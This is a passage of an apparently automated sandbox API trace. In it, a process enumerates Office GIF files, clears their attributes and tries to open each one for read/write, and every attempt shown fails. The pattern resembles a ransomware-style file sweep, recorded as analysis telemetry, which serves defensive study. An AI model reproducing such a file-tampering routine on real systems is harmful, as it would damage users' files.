flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.974] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15155_.GIF", dwFileAttributes=0x80) returned 0 [0135.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15155_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15155_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.974] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.974] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.975] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.975] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.975] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15156_.GIF", dwFileAttributes=0x80) returned 0 [0135.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15156_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15156_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.975] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.975] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.975] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.975] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.975] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15184_.GIF", dwFileAttributes=0x80) returned 0 [0135.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15184_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15184_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.976] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.976] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.976] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.976] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.976] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15185_.GIF", dwFileAttributes=0x80) returned 0 [0135.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15185_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15185_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.976] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.976] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.976] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.977] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.977] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15301_.GIF", dwFileAttributes=0x80) returned 0 [0135.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15301_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15301_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.977] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.977] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.978] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.978] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.978] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15302_.GIF", dwFileAttributes=0x80) returned 0 [0135.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15302_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15302_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.978] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.978] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.978] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.978] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.979] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21303_.GIF", dwFileAttributes=0x80) returned 0 [0135.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21303_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21303_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.979] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.979] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.979] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.979] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.979] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21305_.GIF", dwFileAttributes=0x80) returned 0 [0135.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21305_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21305_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.980] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.980] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.980] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.980] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.980] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21307_.GIF", dwFileAttributes=0x80) returned 0 [0135.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21307_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21307_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.980] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.980] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.980] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.981] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.981] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21309_.GIF", dwFileAttributes=0x80) returned 0 [0135.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21309_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21309_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.981] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.981] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.981] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.981] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.981] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21311_.GIF", dwFileAttributes=0x80) returned 0 [0135.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21311_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21311_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.982] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.982] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.982] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.982] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.982] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21313_.GIF", dwFileAttributes=0x80) returned 0 [0135.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21313_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21313_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.982] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.982] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.983] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.983] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.983] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21315_.GIF", dwFileAttributes=0x80) returned 0 [0135.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21315_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21315_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.983] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.983] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.983] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.983] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.984] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21318_.GIF", dwFileAttributes=0x80) returned 0 [0135.984] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21318_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21318_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.984] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.984] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.984] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.984] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.985] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21319_.GIF", dwFileAttributes=0x80) returned 0 [0135.985] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21319_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21319_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.985] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.986] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.986] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.986] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.986] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21320_.GIF", dwFileAttributes=0x80) returned 0 [0135.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21320_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21320_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.986] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.986] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.986] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.986] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.987] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21321_.GIF", dwFileAttributes=0x80) returned 0 [0135.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21321_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21321_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.987] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.987] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.987] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.987] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.987] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21322_.GIF", dwFileAttributes=0x80) returned 0 [0135.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21322_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21322_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.988] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.988] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.988] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.988] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.988] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21323_.GIF", dwFileAttributes=0x80) returned 0 [0135.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21323_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21323_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.989] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.989] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.989] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.989] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.990] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21324_.GIF", dwFileAttributes=0x80) returned 0 [0135.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21324_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21324_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.990] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.990] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.990] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.990] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.990] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21325_.GIF", dwFileAttributes=0x80) returned 0 [0135.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21325_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21325_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.991] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.991] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.991] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.991] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.991] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21326_.GIF", dwFileAttributes=0x80) returned 0 [0135.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21326_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21326_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.991] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.991] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.992] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.992] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.992] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21328_.GIF", dwFileAttributes=0x80) returned 0 [0135.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21328_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21328_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.992] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.992] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.992] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.992] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.993] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21330_.GIF", dwFileAttributes=0x80) returned 0 [0135.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21330_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21330_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.993] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.993] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.993] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.993] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.993] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21332_.GIF", dwFileAttributes=0x80) returned 0 [0135.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21332_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21332_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.994] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.994] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.994] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.994] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.994] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21334_.GIF", dwFileAttributes=0x80) returned 0 [0135.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21334_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21334_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.994] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.995] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.995] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.995] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.995] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21336_.GIF", dwFileAttributes=0x80) returned 0 [0135.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21336_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21336_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.995] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.995] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.995] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.995] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.996] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21338_.GIF", dwFileAttributes=0x80) returned 0 [0135.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21338_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21338_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.996] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.996] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.996] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.996] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.997] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21340_.GIF", dwFileAttributes=0x80) returned 0 [0135.997] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21340_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21340_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.997] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.997] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.997] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.997] 